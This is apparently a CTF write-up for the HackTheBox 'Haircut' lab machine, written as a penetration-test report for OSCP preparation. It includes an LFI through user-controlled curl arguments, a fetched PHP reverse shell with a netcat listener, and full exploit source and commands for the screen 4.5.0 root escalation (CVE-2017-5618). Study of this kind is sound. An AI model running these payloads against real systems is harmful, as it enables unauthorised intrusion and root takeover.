Haircut CTF Writeup
Table of Contents
ToggleWriteup presented by Behind Security as part of the Road to OSCP series, focusing on the Haircut CTF from HackTheBox.
Haircut CTF
Haircut CTF touches on several useful attack vectors. Most notably, this machine demonstrates the risk of user-specified CURL arguments, which still impacts many active services today.
HackTheBox
Hack The Box gives individuals, businesses and universities the tools they need to continuously improve their cybersecurity capabilities — all in one place.
Executive Summary
Introduction
This penetration test focused on the IP address 10.10.10.24
with the objective of identifying and assessing vulnerabilities within the target system. The assessment covered service enumeration, web server enumeration, initial access vulnerabilities, and post-exploitation issues.
Objective
The goal of this penetration test was to evaluate the security posture of the target system, identify potential weaknesses, and provide recommendations for mitigating the discovered vulnerabilities.
Requirements
The assessment required thorough testing of the web application hosted at http://10.10.10.24
with a specific emphasis on directory bruteforcing, local file inclusion, and potential remote code execution through arbitrary file upload. Additionally, post-exploitation activities focused on database credentials exposure and local privilege escalation to root.
High-Level Summary of Vulnerabilities
1. Directory Bruteforcing (BS01)
- Description: Lack of security measures to prevent directory bruteforcing attacks.
- Severity: Moderate
- Recommendation: Implement rate limiting or CAPTCHA to mitigate directory bruteforcing attacks.
2. Local File Inclusion (BS02)
- Description: The
exposed.php
script is susceptible to Local File Inclusion (LFI) due to user-input arguments incurl
commands. - Severity: Elevated
- Recommendation: Sanitize user input in the
curl
command to prevent LFI attacks.
3. Remote Code Execution (RCE) via Arbitrary File Upload (BS03)
- Description: The
/uploads
directory allows arbitrary file uploads, leading to potential RCE. - Severity: Extreme
- Recommendation: Validate file types, restrict uploads, and implement proper input validation.
4. Exposed Database Credentials (BS04)
- Description: Database root credentials are stored in clear text within the home directory of the "maria" user.
- Severity: Elevated
- Recommendation: Encrypt or securely store database credentials and limit access to sensitive information.
5. Local Privilege Escalation to Root (BS05)
- Description: Outdated vulnerable version (4.5.0) of
screen
with a SUID bit, susceptible to local privilege escalation. - Severity: Extreme
- Recommendation: Update
screen
to a non-vulnerable version and regularly patch and update system software.
Recommendations
- Implement rate limiting or CAPTCHA to mitigate directory bruteforcing attacks (BS01).
- Sanitize user input in the
curl
command to prevent LFI attacks (BS02). - Validate file types, restrict uploads, and implement proper input validation to prevent RCE via arbitrary file upload (BS03).
- Encrypt or securely store database credentials and limit access to sensitive information (BS04).
- Update
screen
to a non-vulnerable version and regularly patch and update system software to prevent local privilege escalation to root (BS05).
Methodology
The assessment employed automated tools such as Feroxbuster for directory bruteforcing and manual testing for LFI, RCE, and privilege escalation vulnerabilities. Post-exploitation activities involved identifying exposed database credentials and exploiting a known vulnerability in the screen
utility.
This summary provides an overview of the key findings and recommendations, but further details and steps to reproduce each vulnerability are available in the "Independent Challenge" section.
Color Legend
Standard console text
Commands inputted by the pentester
Text that we want to highlight
{...} Abbreviated output for brevity
Risk Classification
Independent Challenge - 10.10.10.24
export IP=10.10.10.24
Service Enumeration
IP Address | Ports Open |
---|---|
10.10.10.24 | TCP: 22, 80 |
Web Server Enumeration (80/tcp)
BS01 - Directory Bruteforcing
Vulnerability Explanation: No security is in place to prevent directory bruteforcing attacks, allowing an attacker to easily map the directory tree of the web application.
Vulnerability Fix: Implement rate limiting or CAPTCHA to mitigate directory bruteforcing attacks.
Severity: Moderate
Steps to Reproduce the Attack:
- Run an automated tool like
feroxbuster -u http://10.10.10.24 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30 -x php
.
Additional Comments: Feroxbuster scan output is generally good to read, and it is recursive by default, so whenever it founds another path to follow, it will automatically follow it.
BS02 - Local File Inclusion
Vulnerability Explanation: The php script located at http://10.10.10.24/exposed.php
is using curl
with user-input arguments. This leads to a Local File Inclusion (LFI) vulnerability, as the attacker can pass file://
as input and read local files.
Vulnerability Fix: Sanitize user input in the curl
command to prevent LFI attacks.
Severity: Elevated
Steps to Reproduce the Attack:
- Go to
http://10.10.10.24/exposed.php
. - Retrieve local files by providing
file:///etc/passwd
. You can change/etc/passwd
for whatever file you want to read.
BS03 - Initial Access: Remote Code Execution (RCE) via Arbitrary File Upload
Vulnerability Explanation: As previously stated, the script at http://10.10.10.24/exposed.php
is using curl
with user-supplied arguments. The enumeration of the web server structure pointed in BS01 shows the presence of a /uploads
directory, which usually is configured to be world-writable so it can receive uploads. An attacker can use this directory to arbitrarily upload a malicious php script and trick the server into executing it.
Vulnerability Fix: Validate file types and restrict uploads to specific directories. Implement proper input validation.
Severity: Extreme
Steps to Reproduce the Attack:
- Download a php reverse shell
- Open the script on your favourite text editor and make edit the ip value to your TUN-0 ip address
- Host the script using a simple python3 web server:
sudo python3 -m http.server 80
- Go to
http://10.10.10.24/exposed.php
and use the following to make the server hit your web server and download the reverse shell to it's /upload folder:http://YOUR-TUN0-IP-ADDRESS/php-reverse-shell.php -o uploads/evil.php
- Fire up a netcat listener on port 1234 (if you haven't changed the port value in the php reverse shell):
nc -lvnp 1234
- Hit the php reverse shell at
http://10.10.10.24/uploads/evil.php
and enjoy your shell.
Post Exploitation
BS04 - Exposed Database Credentials
Vulnerability Explanation: Database root credentials (user and password) were found in clear text within the home directory of "maria" user.
Vulnerability Fix: Encrypt or securely store database credentials. Limit access to sensitive information.
Severity: Elevated
Steps to Reproduce the Attack:
- Run
cat /home/maria/.tasks/task1
BS05 - Local Privilege Escalation to Root
Vulnerability Explanation: An outdated version (4.5.0) of screen
is present on the system, with a SUID bit. This specific version is vulnerable to a Local Privilege Escalation (LPE) to root by abusing the overwrite of ld.so.preload
. The vulnerability is known as CVE-2017-5618
.
Vulnerability Fix: Update screen
to a non-vulnerable version. Regularly patch and update system software.
Severity: Extreme
Steps to Reproduce the Attack:
- Paste the following on your local machine's terminal to create
libhax.c
:
cat << EOF > libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}
EOF
- Compile it and remove the c program:
gcc -fPIC -shared -ldl -o libhax.so libhax.c && rm -f libhax.c
- Paste the following on your local machine's terminal to create
rootshell.c
:
cat << EOF > rootshell.c
#include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}
EOF
- Compile it and remove the c program:
gcc -o rootshell rootshell.c && rm -f rootshell.c
- Create
exploit.sh
and insert the following using your favourite text editor:
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017)
echo "~ gnu/screenroot ~"
cd /etc
umask 000
/usr/bin/screen-4.5.0 -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
/usr/bin/screen-4.5.0 -ls # screen itself is setuid, so...
/tmp/rootshell
- Run the following to start a http server using python to transfer the compiled programs and the
exploit.sh
to the victim machine:sudo python3 -m http.server 80
- Within the victim machine, head to /tmp:
cd /tmp
and use wget to transfer the exploit files from your machine:wget http://YOUR-TUN0-IP-ADDRESS/rootshell && wget http://YOUR-TUN0-IP-ADDRESS/libhax.so && wget http://YOUR-TUN0-IP-ADDRESS/exploit.sh
- Mark the exploit as executable and run it:
chmod +x exploit.sh && ./exploit.sh
. You'll get a root shell.
Conclusion
We hope you have found our content useful and invite you to explore more of our website to discover other interesting topics we cover. From cybersecurity to programming, we strive to provide our readers with the latest and most relevant information that can help them stay informed and ahead of the curve. We are committed to providing the best user experience to you and are open to feedback and suggestions through our contact form. Thank you for choosing Behind Security, we hope to see you again soon!
BEHIND SECURITY
Behind Security is an online platform dedicated to providing informative articles on cybersecurity, privacy, and programming.